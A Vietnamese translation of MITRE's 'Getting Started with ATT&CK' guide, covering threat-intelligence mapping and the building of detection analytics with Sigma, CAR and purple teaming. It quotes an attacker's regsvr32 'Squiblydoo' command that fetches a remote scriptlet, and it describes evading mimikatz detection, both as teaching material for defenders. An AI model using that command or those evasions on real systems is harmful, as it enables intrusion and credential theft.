Tài Liệu Tổng Quan Về Mitre Attack

Dưới đây là bản dịch sang tiếng Việt của tài liệu “Getting Started with ATT&CK” được thực hiện bởi BQT Securty365 .

MỤC LỤC
Lời nói đầu
Tình báo về Mối đe dọa
Phát hiện và Phân tích
Mô phỏng Đối thủ và Red Teaming
Đánh giá và Kỹ thuật
Giới thiệu về các Tác giả
Giới thiệu về ATT&CK
Giới thiệu về MITRE

LỜI NÓI ĐẦU
Thật tuyệt vời khi chứng kiến sự lan tỏa và áp dụng của framework ATT&CK™ của MITRE trong thế giới an ninh mạng trong vài năm qua. Chúng tôi đã rất vui khi làm việc với một cộng đồng sôi nổi và ngày càng phát triển, đã tạo ra rất nhiều bài viết, bài thuyết trình, bài đăng blog và tweet hữu ích, tất cả đều giúp mọi người hiểu về ATT&CK.

Mặc dù có những nguồn tài nguyên tuyệt vời này, chúng tôi cảm thấy hầu hết các tài liệu ngoài kia hoặc là giới thiệu ATT&CK là gì hoặc đi sâu vào các chủ đề nâng cao xung quanh ATT&CK. Nhưng nếu bạn chỉ mới bước đầu tiên với nó thì sao?

Đó là lý do tại sao chúng tôi đã quyết định viết một loạt bài đăng blog về việc bắt đầu với ATT&CK. Các bài đăng, lấy cảm hứng từ bài nói chuyện của Katie Nickels tại Sp4rkcon “Đưa MITRE ATT&CK vào hành động với những gì bạn có, nơi bạn đang ở”, được viết bởi các thành viên của nhóm ATT&CK và tập trung vào bốn trường hợp sử dụng chính mà chúng tôi coi là của ATT&CK.

Đối với mỗi trường hợp sử dụng, các tác giả đã đưa ra lời khuyên về cách một tổ chức có thể bắt đầu với ATT&CK dựa trên các nguồn lực sẵn có và mức độ trưởng thành tổng thể.

Ấn phẩm này tập hợp trí tuệ tập thể của họ, ban đầu được đăng trên Medium, thành một gói duy nhất. Chúng tôi hy vọng bạn đọc nó và có được một số ý tưởng mới về việc bắt đầu với ATT&CK. Hãy cho chúng tôi biết suy nghĩ của bạn—chúng tôi rất mong nhận được phản hồi của bạn.

Adam Pennington
Kỹ sư An ninh mạng Chính
Tổng biên tập Blog ATT&CK
MITRE

  1. TÌNH BÁO VỀ MỐI ĐE DỌA
    Katie Nickels

Dựa trên phản hồi từ những người sử dụng ATT&CK, và cả tại ATT&CKcon đầu tiên và từ các kênh khác, chúng tôi đã học được rất nhiều. Khi nói chuyện với các bạn, chúng tôi nhận ra rằng chúng tôi cần thực hiện một bước lùi và tập trung vào một câu hỏi mà nhiều người trong số các bạn có: Làm thế nào để bắt đầu sử dụng ATT&CK?

Cuốn sách này được bắt đầu như một loạt bài đăng nhằm trả lời câu hỏi đó cho bốn trường hợp sử dụng chính:

  • Tình báo mối đe dọa
  • Phát hiện và phân tích
  • Mô phỏng đối thủ và Red Teaming
  • Đánh giá và kỹ thuật

Chúng tôi đã tái tổ chức trang web để chia sẻ nội dung dựa trên các trường hợp sử dụng này, và hy vọng những bài đăng này sẽ bổ sung cho các tài nguyên đó.

ATT&CK có thể hữu ích cho bất kỳ tổ chức nào muốn chuyển sang phòng thủ dựa trên mối đe dọa, vì vậy chúng tôi muốn chia sẻ ý tưởng về cách bắt đầu bất kể nhóm của bạn tinh vi đến mức nào. Chúng tôi sẽ chia mỗi bài đăng thành các cấp độ khác nhau:

  • Cấp độ 1 cho những người mới bắt đầu có thể không có nhiều tài nguyên
  • Cấp độ 2 cho các nhóm cấp trung bình bắt đầu trưởng thành
  • Cấp độ 3 cho các nhóm và tài nguyên an ninh mạng tiên tiến hơn

Chúng tôi bắt đầu cuốn sách này bằng cách nói về tình báo về mối đe dọa vì đó là trường hợp sử dụng tốt nhất (mặc dù tôi chắc rằng các đồng nghiệp của tôi có thể không đồng ý với điều đó!).

Vào năm 2018, tôi đã cung cấp một tổng quan cấp cao về cách bạn có thể sử dụng ATT&CK để nâng cao tình báo về mối đe dọa mạng (CTI). Trong chương này, tôi sẽ xây dựng dựa trên đó và chia sẻ lời khuyên thực tế để bắt đầu.

CẤP ĐỘ 1
Tình báo về mối đe dọa mạng xoay quanh việc biết những gì đối thủ của bạn làm và sử dụng thông tin đó để cải thiện việc ra quyết định. Đối với một tổ chức chỉ có một vài nhà phân tích muốn bắt đầu sử dụng ATT&CK cho tình báo về mối đe dọa, một cách bạn có thể bắt đầu là lấy một nhóm duy nhất mà bạn quan tâm và xem xét hành vi của họ theo cấu trúc trong ATT&CK.

Bạn có thể chọn một nhóm từ những nhóm chúng tôi đã lập bản đồ trên trang web của mình dựa trên các tổ chức mà họ đã nhắm mục tiêu trước đây. Ngoài ra, nhiều nhà cung cấp đăng ký tình báo mối đe dọa cũng lập bản đồ cho ATT&CK, vì vậy bạn có thể sử dụng thông tin của họ làm tài liệu tham khảo.

Ví dụ: Nếu bạn là một công ty dược phẩm, bạn có thể tìm kiếm trong thanh Tìm kiếm của chúng tôi hoặc trên trang Nhóm của chúng tôi để xác định rằng APT19 là một nhóm đã nhắm mục tiêu lĩnh vực của bạn.

Từ đó, bạn có thể truy cập trang của nhóm đó để xem các kỹ thuật mà họ đã sử dụng (chỉ dựa trên các báo cáo nguồn mở mà chúng tôi đã lập bản đồ) để bạn có thể tìm hiểu thêm về họ. Nếu bạn cần thêm thông tin về kỹ thuật vì bạn không quen thuộc với nó, không sao cả – nó có ngay trên trang web ATT&CK. Bạn có thể lặp lại điều này cho từng mẫu phần mềm mà chúng tôi đã lập bản đồ nhóm sử dụng, mà chúng tôi theo dõi riêng biệt trên trang web ATT&CK.

Ví dụ: Một kỹ thuật được APT19 sử dụng là Registry Run Keys/Startup Folder.

Vậy làm thế nào để chúng ta biến thông tin này thành hành động, mà đó là toàn bộ ý nghĩa của tình báo mối đe dọa? Hãy chia sẻ nó với các bộ phận phòng thủ của chúng ta, vì đây là một nhóm đã nhắm mục tiêu lĩnh vực của chúng ta và chúng ta muốn phòng thủ chống lại họ. Khi làm điều này, bạn có thể kiểm tra trang web ATT&CK để lấy một số ý tưởng để bắt đầu với Phát hiện và Giảm thiểu các kỹ thuật.

Ví dụ: Cho bộ phận phòng thủ của bạn biết về khóa chạy Registry cụ thể mà APT19 đã sử dụng. Tuy nhiên, họ có thể thay đổi điều đó và sử dụng khóa chạy khác. Nếu bạn xem lời khuyên Phát hiện cho kỹ thuật, bạn sẽ thấy khuyến nghị là theo dõi Registry để tìm các khóa chạy mới mà bạn không mong đợi sẽ thấy trong môi trường của mình. Đây sẽ là một cuộc trò chuyện tuyệt vời để có với bộ phận phòng thủ của bạn.

Tóm lại, một cách dễ dàng để bắt đầu sử dụng ATT&CK cho tình báo mối đe dọa là xem xét một nhóm đối thủ mà bạn quan tâm. Xác định một số hành vi mà họ đã sử dụng giúp bạn thông báo cho bộ phận phòng thủ của mình về cách họ có thể cố gắng phát hiện nhóm đó.

CẤP ĐỘ 2
Nếu bạn có một nhóm các nhà phân tích mối đe dọa thường xuyên xem xét thông tin về đối thủ, một hành động cấp độ tiếp theo mà bạn có thể thực hiện là tự mình lập bản đồ thông tin tình báo cho ATT&CK thay vì sử dụng những gì người khác đã lập bản đồ. Nếu bạn có một báo cáo về một sự cố mà tổ chức của bạn đã xử lý, đây có thể là một nguồn nội bộ tuyệt vời để lập bản đồ cho ATT&CK, hoặc bạn có thể sử dụng một báo cáo bên ngoài như một bài đăng trên blog. Để bắt đầu, bạn chỉ cần bắt đầu với một báo cáo duy nhất.

Ví dụ: Đây là một đoạn trích từ báo cáo của FireEye đã được lập bản đồ cho ATT&CK.

Chúng tôi nhận ra việc cố gắng lập bản đồ cho ATT&CK khi bạn không biết tất cả hàng trăm kỹ thuật có thể khá đáng sợ. Đây là một quy trình bạn có thể làm theo để giúp điều này.

  1. Hiểu ATT&CK – Làm quen với cấu trúc tổng thể của ATT&CK:
    chiến thuật (mục tiêu kỹ thuật của đối thủ), kỹ thuật (cách đạt được các mục tiêu đó) và thủ tục (các cách thực hiện cụ thể của kỹ thuật). Hãy xem trang Bắt đầu và Tài liệu Triết lý của chúng tôi.
  2. Tìm hành vi – Hãy suy nghĩ về hành động của đối thủ theo một cách rộng hơn chứ không chỉ là dấu hiệu nguyên tử (như địa chỉ IP) mà họ đã sử dụng. Ví dụ: phần mềm độc hại trong báo cáo trên “thiết lập kết nối SOCKS5”. Hành động thiết lập kết nối là một hành vi mà đối thủ đã thực hiện.
  3. Nghiên cứu hành vi – Nếu bạn không quen thuộc với hành vi, bạn có thể cần nghiên cứu thêm. Trong ví dụ của chúng ta, một chút nghiên cứu sẽ cho thấy rằng SOCKS5 là một giao thức Lớp 5 (lớp phiên).
  4. Chuyển đổi hành vi thành một chiến thuật – Xem xét mục tiêu kỹ thuật của đối thủ cho hành vi đó và chọn một chiến thuật phù hợp. Tin tốt là chỉ có 12 chiến thuật để lựa chọn trong ATT&CK cho Enterprise. Đối với ví dụ kết nối SOCKS5, việc thiết lập kết nối để sau này giao tiếp sẽ rơi vào chiến thuật Command and Control (Chỉ huy và Kiểm soát).
  5. Tìm ra kỹ thuật nào áp dụng cho hành vi – Điều này có thể hơi khó, nhưng với kỹ năng phân tích của bạn và các ví dụ trên trang web ATT&CK, nó hoàn toàn khả thi. Nếu bạn tìm kiếm SOCKS trên trang web của chúng tôi, kỹ thuật Standard Non-Application Layer Protocol (T1095) sẽ xuất hiện. Khi nhìn vào mô tả kỹ thuật, bạn sẽ thấy đây có thể là nơi hành vi của chúng ta phù hợp.
  6. So sánh kết quả của bạn với các nhà phân tích khác – Tất nhiên, bạn có thể có cách giải thích hành vi khác với nhà phân tích khác. Điều này là bình thường và xảy ra mọi lúc trong nhóm ATT&CK! Tôi rất khuyên bạn nên so sánh việc lập bản đồ ATT&CK của thông tin của bạn với nhà phân tích khác và thảo luận về mọi khác biệt.

Đối với các nhóm CTI có một vài nhà phân tích, việc tự lập bản đồ thông tin cho ATT&CK có thể là một cách tốt để đảm bảo bạn nhận được thông tin phù hợp nhất để đáp ứng các yêu cầu của tổ chức mình. Từ đó, bạn có thể chuyển thông tin kẻ thù đã được lập bản đồ ATT&CK cho nhóm phòng thủ của mình để định hướng phòng thủ, như chúng ta đã thảo luận ở trên.

CẤP ĐỘ 3 Nếu nhóm CTI của bạn ở trình độ nâng cao, bạn có thể bắt đầu lập bản đồ thêm thông tin cho ATT&CK và sau đó sử dụng thông tin đó để ưu tiên cách bạn phòng thủ. Lấy quy trình ở trên, bạn có thể tự lập bản đồ thông tin nội bộ và ngoài cho ATT&CK, bao gồm dữ liệu ứng phó sự cố, báo cáo từ đăng ký OSINT hoặc tình báo mối đe dọa, cảnh báo thời gian thực và thông tin lịch sử của tổ chức bạn.

Khi bạn đã lập bản đồ dữ liệu này, bạn có thể làm một số việc thú vị để so sánh các nhóm và ưu tiên các kỹ thuật thường được sử dụng. Ví dụ: xem chế độ xem ma trận này từ ATT&CK Navigator mà tôi đã chia sẻ trước đây với các kỹ thuật mà chúng tôi đã lập bản đồ trên trang web ATT&CK. Các kỹ thuật chỉ được APT3 sử dụng được đánh dấu màu xanh lam; các kỹ thuật chỉ được APT29 sử dụng được đánh dấu màu vàng và các kỹ thuật được cả APT3 và APT29 sử dụng được đánh dấu màu xanh lá cây. (Tất cả những điều này chỉ dựa trên thông tin có sẵn công khai mà chúng tôi đã lập bản đồ, đó chỉ là một tập hợp con của những gì các nhóm đó đã làm.)

Bạn nên thay thế các nhóm và kỹ thuật mà bạn quan tâm dựa trên các mối đe dọa hàng đầu của tổ chức bạn. Để giúp bạn tạo các lớp Navigator của riêng mình như tôi đã làm ở trên, đây là một hướng dẫn từng bước về các bước bạn có thể thực hiện để tạo ma trận ở trên, cũng như video hướng dẫn cũng cung cấp tổng quan về chức năng của Navigator.

Sau đó, chúng ta có thể tổng hợp thông tin để xác định các kỹ thuật thường được sử dụng, điều này có thể giúp nhóm phòng thủ biết những gì cần ưu tiên. Trong ma trận của chúng tôi ở trên, nếu APT3 và APT29 là hai nhóm mà một tổ chức coi là mối đe dọa cao đối với họ, thì các kỹ thuật màu xanh lá cây có thể có độ ưu tiên cao nhất để xác định cách giảm thiểu và phát hiện. Nếu nhóm phòng thủ của chúng tôi đã cung cấp cho nhóm CTI yêu cầu giúp tìm ra nơi họ nên ưu tiên tài nguyên cho phòng thủ, chúng tôi có thể chia sẻ thông tin này với họ như một nơi để họ bắt đầu.

Nếu nhóm phòng thủ của chúng tôi đã đánh giá những gì họ có thể phát hiện (chúng tôi sẽ đề cập trong các chương tương lai), bạn có thể xếp chồng thông tin đó lên trên những gì bạn biết về các mối đe dọa của mình. Đây là một nơi tuyệt vời để tập trung nguồn lực của bạn vì bạn biết các nhóm bạn quan tâm đã sử dụng các kỹ thuật đó và bạn không thể phát hiện chúng!

Bạn có thể tiếp tục thêm vào các kỹ thuật mà bạn đã quan sát thấy đối thủ thực hiện dựa trên dữ liệu bạn có và phát triển một “bản đồ nhiệt” của các kỹ thuật thường được sử dụng. Brian Beyer và tôi đã nói chuyện tại Hội nghị thượng đỉnh SANS CTI về cách chúng tôi đưa ra các “top 20” kỹ thuật khác nhau dựa trên các bộ dữ liệu do MITRE và Red Canary biên soạn. Nhóm của bạn có thể làm theo quy trình tương tự để tạo ra “top 20” của riêng mình.

Quy trình lập bản đồ các kỹ thuật ATT&CK này không hoàn hảo và có sự thiên vị nhưng thông tin này vẫn có thể giúp bạn bắt đầu có một bức tranh rõ ràng hơn về những gì đối thủ đang làm. (Bạn có thể đọc thêm về thiên vị và hạn chế trong bộ slide này và chúng tôi hy vọng sẽ sớm chia sẻ thêm suy nghĩ.)

Đối với một nhóm chuyên môn tìm cách sử dụng ATT&CK cho CTI, việc lập bản đồ các nguồn khác nhau cho ATT&CK có thể giúp bạn hiểu sâu về hành vi của đối thủ để giúp ưu tiên và định hướng phòng thủ trong tổ chức của bạn.

TÓM TẮT Trong chương đầu tiên của hướng dẫn Bắt đầu, chúng tôi đã hướng dẫn bạn qua ba cấp độ khác nhau về cách bắt đầu với ATT&CK và tình báo mối đe dọa, tùy thuộc vào nguồn lực của nhóm bạn. Trong các chương tương lai, chúng tôi sẽ đi sâu vào cách bạn có thể bắt đầu với các trường hợp sử dụng khác, bao gồm phát hiện và phân tích, mô phỏng đối thủ và red teaming, và đánh giá và kỹ thuật.

  1. PHÁT HIỆN VÀ PHÂN TÍCH John Wunder

Hy vọng bạn đã có cơ hội đọc Chương 1 về việc bắt đầu sử dụng ATT&CK cho tình báo mối đe dọa, trình bày về việc hiểu đối thủ đang làm gì để tấn công bạn và cách sử dụng kiến thức đó để ưu tiên những gì cần bảo vệ. Trong chương này, tôi sẽ nói về cách xây dựng các phát hiện cho các hành vi đó.

Như với chương đầu tiên trong cuốn sách này, chương này sẽ được chia theo cấp độ dựa trên mức độ tinh vi của nhóm của bạn và nguồn lực bạn có quyền truy cập:

  • Cấp độ 1 cho những người mới bắt đầu có thể không có nhiều nguồn lực
  • Cấp độ 2 cho những nhóm cấp trung bình bắt đầu trưởng thành
  • Cấp độ 3 cho những nhóm và nguồn lực an ninh mạng tiên tiến hơn

Xây dựng phân tích để phát hiện các kỹ thuật ATT&CK có thể khác với cách bạn thường làm phát hiện. Thay vì xác định những thứ được biết là xấu và chặn chúng, phân tích dựa trên ATT&CK liên quan đến việc thu thập dữ liệu nhật ký và sự kiện về những gì đang xảy ra trên hệ thống của bạn và sử dụng nó để xác định các hành vi đáng ngờ được mô tả trong ATT&CK.

CẤP ĐỘ 1 Bước đầu tiên để tạo và sử dụng phân tích ATT&CK là hiểu dữ liệu và khả năng tìm kiếm bạn có. Để tìm các hành vi đáng ngờ, sau tất cả, bạn cần có thể nhìn thấy những gì đang xảy ra trên hệ thống của mình. Một cách để làm điều này là xem Nguồn dữ liệu được liệt kê cho mỗi kỹ thuật ATT&CK. Các nguồn dữ liệu đó mô tả các loại dữ liệu có thể cho bạn tầm nhìn về kỹ thuật đã cho. Nói cách khác, chúng cung cấp cho bạn một điểm khởi đầu tốt cho những gì cần thu thập.

Nếu bạn xem qua các nguồn dữ liệu cho một loạt các kỹ thuật khác nhau hoặc làm theo cách tiếp cận mà Roberto Rodriguez và Jose Luis Rodriguez đã trình bày tại ATT&CKcon để xem qua các kỹ thuật tại các nguồn dữ liệu (MITRE cũng tạo một số tập lệnh trợ giúp), bạn sẽ nhận thấy rằng một số nguồn có giá trị để phát hiện một số lượng lớn các kỹ thuật:

  • Giám sát quá trình và dòng lệnh quá trình, thường được thu thập bởi Sysmon, Nhật ký sự kiện Windows và nhiều nền tảng EDR
  • Giám sát tệp và sổ đăng ký, cũng thường được thu thập bởi Sysmon, Nhật ký sự kiện Windows và nhiều nền tảng EDR
  • Nhật ký xác thực, chẳng hạn như những nhật ký được thu thập từ bộ điều khiển tên miền thông qua Nhật ký sự kiện Windows
  • Bắt gói, đặc biệt là bắt đông/tây, chẳng hạn như được thu thập giữa các máy chủ và vùng bao quanh trong mạng của bạn bởi các cảm biến như Zeek

Khi bạn biết mình có dữ liệu gì, bạn sẽ cần thu thập dữ liệu đó vào một số nền tảng tìm kiếm (Quản lý Thông tin và Sự kiện Bảo mật hoặc SIEM) để bạn có thể chạy phân tích trên đó. Bạn có thể đã có điều này như một phần của hoạt động CNTT hoặc bảo mật của mình hoặc nó có thể là thứ mới mà bạn cần xây dựng. Đối với các ảnh chụp màn hình này và hướng dẫn, tôi sẽ sử dụng ELK (ElasticSearch/Logstash/Kibana) với dữ liệu Sysmon, nhưng có rất nhiều sản phẩm thương mại và nguồn mở và chúng tôi không khuyến nghị bất kỳ nền tảng cụ thể nào. Đừng đánh giá thấp các bước này trong quá trình; điều chỉnh việc thu thập dữ liệu của bạn thường là phần khó nhất!

Nội dung cấp độ 0 thưởng: Cần truy cập vào một tập dữ liệu doanh nghiệp tốt để kiểm tra? Hãy xem tập dữ liệu Boss of the SOC (BOTS) từ Splunk hoặc tập dữ liệu BRAWL từ MITRE. Cả hai đều có sẵn dưới dạng JSON và do đó có thể được tải vào Splunk, ELK và các SIEM khác. BOTS rất đầy đủ và chứa nhiễu thực sự, trong khi BRAWL được hạn chế hơn nhiều và chỉ tập trung vào hoạt động của red team.

Khi bạn đã có dữ liệu trong SIEM của mình, bạn đã sẵn sàng để thử một số phân tích. Một điểm khởi đầu tuyệt vời là xem các phân tích do những người khác tạo và chạy chúng với dữ liệu của bạn. Có một số kho phân tích được liệt kê trong các tài nguyên bên dưới, nhưng một phân tích khởi đầu tốt nếu bạn có dữ liệu quá trình endpoint là CAR-2016–03–002. Nó sẽ cố gắng tìm cách sử dụng WMI để thực thi các lệnh trên các hệ thống từ xa, một kỹ thuật phổ biến của đối thủ được mô tả bởi Windows Management Instrumentation.

Bạn sẽ muốn đọc và hiểu mô tả để biết nó đang tìm kiếm điều gì, nhưng phần quan trọng để chạy nó là mã giả ở dưới cùng. Dịch mã giả đó thành tìm kiếm cho bất kỳ SIEM nào bạn đang sử dụng (đảm bảo tên trường trong dữ liệu của bạn là chính xác) và bạn có thể chạy nó để nhận kết quả. Nếu bạn không thoải mái dịch mã giả, bạn cũng có thể sử dụng một công cụ nguồn mở có tên là Sigma và kho lưu trữ quy tắc của nó để dịch sang mục tiêu của bạn. Trong trường hợp này, CAR-2016–03–002 đã được đưa vào một quy tắc Sigma.

Nếu bạn đã cài đặt Sigma và bạn đang ở trong thư mục của nó, bạn có thể chạy lệnh này để nhận (ví dụ) truy vấn ELK / WinLogBeats:

sigmac –target es-qs -c tools/config/winlogbeat.yml rules/windows/process_creation/win_susp_wmi_execution.yml

Công việc của bạn bây giờ là xem xét từng kết quả và tìm ra liệu nó có độc hại hay không. Nếu bạn sử dụng tập dữ liệu BRAWL, tất cả đều khá độc hại: nó cố gắng chạy and.exe và khi khám phá thêm các sự kiện liên quan, and.exe vừa được di chuyển đến máy chủ đó qua SMB và được thêm vào các khóa sổ đăng ký tự khởi động để tồn tại. Nếu bạn đang xem dữ liệu doanh nghiệp của chính mình, hy vọng nó lành tính hoặc đã biết dữ liệu red team – nếu không, có lẽ dừng đọc chương này và tìm hiểu xem bạn đang đối phó với điều gì.

Khi bạn đã có tìm kiếm cơ bản trả về dữ liệu và cảm thấy thoải mái rằng bạn có thể hiểu kết quả, hãy cố gắng lọc các kết quả dương tính giả trong môi trường của bạn để không bị quá tải. Mục tiêu của bạn không nên là đạt được không có kết quả dương tính giả; nó nên là giảm chúng càng nhiều càng tốt trong khi vẫn đảm bảo rằng bạn sẽ bắt được hành vi độc hại. Khi phân tích có tỷ lệ dương tính giả thấp, bạn có thể tự động tạo một vé trong SOC của mình mỗi khi phân tích kích hoạt hoặc thêm nó vào thư viện phân tích để sử dụng cho săn lùng mối đe dọa thủ công.

CẤP ĐỘ 2
Khi bạn đã có phân tích do người khác viết trong hoạt động, bạn có thể bắt đầu mở rộng phạm vi bảo hiểm bằng cách tự viết phân tích. Đây là một quá trình phức tạp hơn đòi hỏi hiểu cách các cuộc tấn công hoạt động và chúng được phản ánh trong dữ liệu như thế nào. Để bắt đầu, hãy xem mô tả kỹ thuật từ ATT&CK và các báo cáo tình báo mối đe dọa được liên kết trong các ví dụ.

Ví dụ: giả sử không có phát hiện tốt nào cho Regsvr32. Trang ATT&CK liệt kê một số biến thể khác nhau về cách Regsvr32 được sử dụng. Thay vì viết một phân tích để bao gồm tất cả chúng, hãy tập trung vào chỉ một khía cạnh để tránh phân tán sức lực. Ví dụ, bạn có thể muốn phát hiện biến thể “Squiblydoo” được phát hiện bởi Casey Smith tại Red Canary. Các báo cáo được liên kết từ các ví dụ cho thấy một số trường hợp về dòng lệnh trong đó Regsvr32 được sử dụng, chẳng hạn như ví dụ này từ phân tích của Cybereason về Cobalt Kitty:

Kẻ tấn công đã tải xuống các COM scriplet bằng regsvr32.exe:
regsvr32 / s/n/u/i:hxxp: //support.chatconnecting(.)com:80/pic.png scrobj.dll

Khi bạn hiểu cách kẻ thù sử dụng kỹ thuật, bạn nên tìm ra cách chạy nó để có thể thấy nó trong nhật ký của mình. Một cách dễ dàng để làm điều đó là sử dụng Atomic Red Team, một dự án nguồn mở do Red Canary dẫn đầu cung cấp nội dung red team được liên kết với ATT&CK có thể được sử dụng để kiểm tra phân tích. Ví dụ, bạn có thể tìm danh sách các cuộc tấn công của họ cho Regsvr32, bao gồm cả Squiblydoo. Tất nhiên, nếu bạn đã làm red teaming, hãy tự do chạy các cuộc tấn công mà bạn biết (trên các hệ thống mà bạn có quyền!) và cố gắng phát triển phân tích cho chúng!

Nội dung cấp độ 0 thưởng: Thực sự muốn tạo phân tích của riêng bạn và chạy các cuộc tấn công của riêng bạn nhưng không có mạng của riêng bạn? Hãy dựng một VM và giám sát nó như trên, sau đó chạy các cuộc tấn công trên đó. Detection Lab cung cấp một bộ tập lệnh cấu hình tốt để thực hiện điều đó.

Khi bạn đã chạy cuộc tấn công, hãy xem bên trong SIEM của mình để xem dữ liệu nhật ký nào được tạo ra. Ở giai đoạn này, bạn đang tìm những thứ khiến sự kiện độc hại này trở nên đặc biệt. Tôi chọn Squiblydoo làm ví dụ vì nó dễ dàng: không có lý do chính đáng nào để regsvr32.exe gọi ra Internet, vì vậy một phân tích đơn giản là tìm kiếm thời điểm khi quá trình regsvr32.exe được tạo và dòng lệnh bao gồm “/i:http”.

Một mẫu chung để tuân theo là viết tìm kiếm để phát hiện hành vi độc hại, sửa đổi nó để lọc các kết quả dương tính giả, đảm bảo nó vẫn phát hiện hành vi độc hại và sau đó lặp lại để giảm các loại kết quả dương tính giả khác.

CẤP ĐỘ 3
Cảm thấy tự tin rằng bạn đang tạo ra các phân tích chất lượng để phát hiện các cuộc tấn công từ Atomic Red Team? Kiểm tra sự tự tin đó và cải thiện hệ thống phòng thủ của bạn bằng cách làm một số purple teaming!

Trong thế giới thực, kẻ thù không chỉ thực hiện các cuộc tấn công mẫu được sao chép/dán từ một số cuốn sách. Chúng thích nghi và cố gắng lẩn tránh hệ thống phòng thủ của bạn—bao gồm cả các phân tích của bạn (đó là lý do tại sao có chiến thuật phòng thủ trong ATT&CK). Cách tốt nhất để đảm bảo các phân tích của bạn mạnh mẽ trước sự lẩn tránh là làm việc trực tiếp với một red teamer.

Bạn và blue team của bạn sẽ chịu trách nhiệm tạo phân tích và red team sẽ chịu trách nhiệm mô phỏng kẻ thù – về cơ bản, cố gắng lẩn tránh phân tích của bạn bằng cách thực hiện các loại tấn công và lẩn tránh mà chúng tôi biết từ tình báo mối đe dọa mà các đối thủ sử dụng trong thế giới thực. Nói cách khác, họ sẽ hành động như những kẻ thù thực sự để bạn có thể hiểu phân tích của bạn sẽ đối phó với kẻ thù thực sự như thế nào.

Đây là cách điều đó có thể hoạt động trong thực tế. Bạn có một số phân tích, giả sử để phát hiện đổ thông tin đăng nhập. Có thể bạn đã nghe về mimikatz và viết một phân tích để phát hiện mimikatz.exe trên dòng lệnh hoặc Invoke-Mimikatz qua Powershell. Để purple team điều này, hãy cung cấp phân tích đó cho red team của bạn. Sau đó, họ có thể tìm và thực hiện một cuộc tấn công sẽ lẩn tránh phân tích đó.

Trong trường hợp này, họ có thể đổi tên tệp thực thi thành mimidogz.exe. Tại thời điểm đó, bạn sẽ cần cập nhật phân tích của mình để tìm kiếm các mẫu và hành vi khác nhau sẽ không phụ thuộc vào tên chính xác. Có lẽ bạn tìm kiếm bitmask GrantedAccess cụ thể từ khi mimikatz truy cập lsass.exe (đừng lo lắng về các chi tiết chính xác, đây chỉ là một ví dụ). Bạn sẽ lại cung cấp điều này cho red team của bạn và họ sẽ thực hiện một sự lẩn tránh, ví dụ: thêm một quyền truy cập bổ sung để bitmask GrantedAccess của bạn không còn phát hiện được nó nữa.

Quá trình qua lại này được gọi là purple teaming. Đây là một cách tuyệt vời để nhanh chóng nâng cao chất lượng phân tích của bạn vì nó đo lường khả năng của bạn để phát hiện các cuộc tấn công mà kẻ thù thực sự sử dụng. Khi bạn đến giai đoạn mà bạn đang purple teaming tất cả các phân tích của mình, bạn thậm chí có thể tự động hóa quy trình để đảm bảo bạn không có bất kỳ hồi quy nào và đang bắt được các biến thể mới của các cuộc tấn công. Chúng tôi đang làm việc để phát triển tài liệu như thế này, nói nhiều hơn về mô phỏng đối thủ và red teaming – vì vậy hãy theo dõi để tìm hiểu nhiều hơn về phần đó của quá trình.

Điều này cũng liên quan đến những gì Andy Applebaum sẽ nói trong Chương 4 về Đánh giá SOC ATT&CK. Khi bạn đã tiến bộ đến mức này và đang xây dựng một kho phân tích, bạn sẽ muốn sử dụng ATT&CK (thông qua ATT&CK Navigator hoặc sử dụng các công cụ của riêng bạn) để theo dõi những gì bạn có thể và không thể bao quát. Ví dụ: có thể bạn bắt đầu với danh sách các phân tích mong muốn để phát hiện các kỹ thuật mà Katie Nickels và Brian Beyer chỉ ra trong bài thuyết trình SANS CTI Summit của họ.

Sau đó, bạn tích hợp các phân tích từ CAR và tô màu cam cho chúng để chỉ ra rằng ít nhất bạn có một số phạm vi bảo hiểm (như đã chỉ ra ở trên, một phân tích duy nhất khó có khả năng cung cấp đủ phạm vi bảo hiểm cho bất kỳ kỹ thuật nào).

Sau đó, bạn tinh chỉnh các phân tích đó và có thể thêm nhiều phân tích hơn để cải thiện phạm vi bảo hiểm của bạn cho các kỹ thuật đó. Cuối cùng, có thể bạn đủ thoải mái với khả năng phát hiện của mình đối với một số kỹ thuật đó nên tô màu xanh lá cây cho chúng. Chỉ cần lưu ý rằng bạn sẽ không bao giờ chắc chắn 100% về việc bắt mọi cách sử dụng của một kỹ thuật nhất định, vì vậy màu xanh lá cây không có nghĩa là hoàn thành, nó chỉ có nghĩa là OK cho hiện tại.

Và tất nhiên, theo thời gian, bạn sẽ muốn mở rộng phạm vi của những thứ bạn quan tâm. Bạn có thể tham khảo lại Chương 1 về việc ưu tiên theo tác nhân đe dọa, sử dụng một số tài nguyên do các nhà cung cấp xuất bản để ưu tiên dựa trên mức độ phổ biến của kỹ thuật dựa trên giám sát của họ, hoặc có lẽ tốt nhất, phát triển các phân tích cho hoạt động mà bạn biết từ các sự cố của chính bạn. Cuối cùng, bạn muốn phát triển một bộ phát hiện ngày càng toàn diện hơn để có thể phát hiện ngày càng nhiều những gì kẻ thù làm để tấn công chúng ta – và ATT&CK cung cấp cho bạn thẻ điểm để làm điều đó.

TÓM TẮT
Chương này đã cho bạn một ý tưởng về ý nghĩa của việc xây dựng phân tích để phát hiện các kỹ thuật ATT&CK, cũng như cách suy nghĩ về việc xây dựng một bộ phân tích. Nó xây dựng trên chương trước để chỉ ra rằng bạn không chỉ có thể hiểu những gì kẻ thù có thể làm thông qua tình báo mối đe dọa mạng, mà còn có thể sử dụng tình báo đó để xây dựng phân tích để phát hiện các kỹ thuật đó. Các chương trong tương lai sẽ nói nhiều hơn về cách xây dựng một quy trình kỹ thuật và đánh giá cho hệ thống phòng thủ của bạn, bao gồm cả phân tích, và cách thực hiện red teaming toàn diện để xác thực hệ thống phòng thủ của bạn.

TÍNH NĂNG

  • CAR: Kho phân tích của MITRE
  • EQL: Kho phân tích nguồn mở của Endgame
  • Sigma: Một định dạng độc lập với công cụ cho phân tích, cùng với kho phân tích ở định dạng đó của Florian Roth và Thomas Patzke
  • ThreatHunter Playbook: Kho các chiến lược để tìm kiếm các kỹ thuật ATT&CK trong dữ liệu nhật ký (tức là không phải phân tích, mà là rất nhiều thông tin để giúp bạn xây dựng phân tích) từ Roberto Rodriguez
  • Atomic Red Team: Thư viện của Red Canary về các bài kiểm tra red team cho phân tích của bạn
  • Detection Lab: Một bộ tập lệnh để thiết lập một phòng thí nghiệm đơn giản để kiểm tra phân tích của Chris Long
  • BOTS: Tập dữ liệu Boss of the SOC của Splunk, với cả nhiễu nền và các cuộc tấn công của red team
  • BRAWL Public Game: Tập dữ liệu red team của MITRE
  • ATT&CK Navigator: Một công cụ để trực quan hóa dữ liệu trên ma trận ATT&CK, bao gồm phạm vi bảo hiểm phân tích
